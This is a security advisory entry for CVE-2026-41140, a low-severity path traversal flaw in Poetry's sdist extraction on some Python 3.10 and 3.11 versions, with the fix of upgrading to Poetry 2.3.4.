PT-2026-34538 · Pypi+1 · Poetry+1
Published
2026-04-22
·
Updated
2026-05-26
·
CVE-2026-41140
CVSS v4.0
0.6
Low
| Vector | AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
Poetry versions prior to 2.3.4
Description
The
extractall() function in src/poetry/utils/helpers.py extracts sdist tarballs without path traversal protection on Python versions where tarfile.data filter is unavailable. This occurs specifically on Python versions 3.10.0 through 3.10.12 and 3.11.0 through 3.11.4. An attacker can use a crafted sdist with ../../ tar member paths to perform arbitrary file writes outside the intended extraction directory. This can be achieved through direct path traversal, symlink traversal, or hardlink attacks. The issue is triggered during metadata resolution or when building a package from sdist.Recommendations
Update Poetry to version 2.3.4 or newer.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Poetry
Red Os